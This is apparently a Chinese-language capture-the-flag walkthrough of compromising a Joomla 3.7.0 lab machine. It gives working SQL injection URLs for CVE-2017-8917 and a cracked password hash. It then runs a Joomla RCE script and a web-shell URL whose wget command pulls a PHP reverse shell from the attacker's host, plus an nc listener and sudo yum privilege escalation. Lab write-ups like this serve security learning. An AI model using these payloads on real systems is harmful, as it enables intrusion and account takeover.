1.端口扫描
2.Web渗透
用dirsearch扫描一下网站目录
试了几次只有/administrator能进去
可以看到这是个Joomla-CMS,用joomscan扫描一下
可以看到joomla版本是3.7.0,搜索一下相关漏洞,发现可以进行报错注入
参考:joomla 3.7 SQL Injection(CVE-2017-8917)漏洞复现 - 简书 (jianshu.com)
http://10.10.12.235/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(1,concat(0x3a,user(),0x3a),0)
经过实验,爆出来的表名不完整,可以加上HEX()函数使其变为16进制
http://10.10.12.235/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=UpdateXML(2,%20concat(0x3a,(SELECT(SUBSTRING(HEX(TABLE_NAME),%201,%2020))FROM(information_schema.tables)%20where%20table_schema=database()%20LIMIT%200,1),0x3a),1)
最后发现有70多个表(吐了),其中有个表是users,可以看到用户和密码
其实原来这里有个爆破脚本的(晕),脚本地址:exploits/Joomblah/joomblah.py at master · XiphosResearch/exploits · GitHub
用户名是jonah,密码是$2y$10$0veO/JSFh4389Lluc4Xya.dfy2MF.bZhz0jVMw.V.d3p12kBtZutm
这里的密码还需要用john来解密出来
最终密码是spiderman123,现在可以登录进去了
关于joomla还有一个rce漏洞:(CVE-2020-10238)
参考:(CVE-2020-10238)Joomla远程代码执行_open source matters-CSDN博客
脚本地址:CVE-2020-10238/CVE-2020-10238/RCE.py at master · HoangKien1020/CVE-2020-10238 · GitHub 成功执行脚本,现在网页进入http://10.10.12.235/templates/protostar/error.php?cmd=whoami
可以看到已经成功rce,接下来就是反弹shell了
本地开启http服务
http://10.10.12.235/templates/protostar/error.php?cmd=wget http://10.2.93.221:8000/php-reverse-shell.php
网页成功下载本地php木马, 接下来本地监听1234端口,再激活木马即可
nc -lnvp 1234
http://10.10.12.235/templates/protostar/php-reverse-shell.php
成功反弹shell
3.权限提升
我们刚才拿到apache用户的shell,搜索一下user.txt
没有权限进入jjameson用户,去其他地方看了一下也没有能提权的方法
接下来进入/var/www/html查看配置文件
查看configuration.php
这里有一串password是,经过尝试并不是root的密码而是jjameson的
通过ssh登录jjameson用户
成功登录进来,查看user.txt
sudo -l
可以运行sudo yum ,搜索exp
成功拿下root权限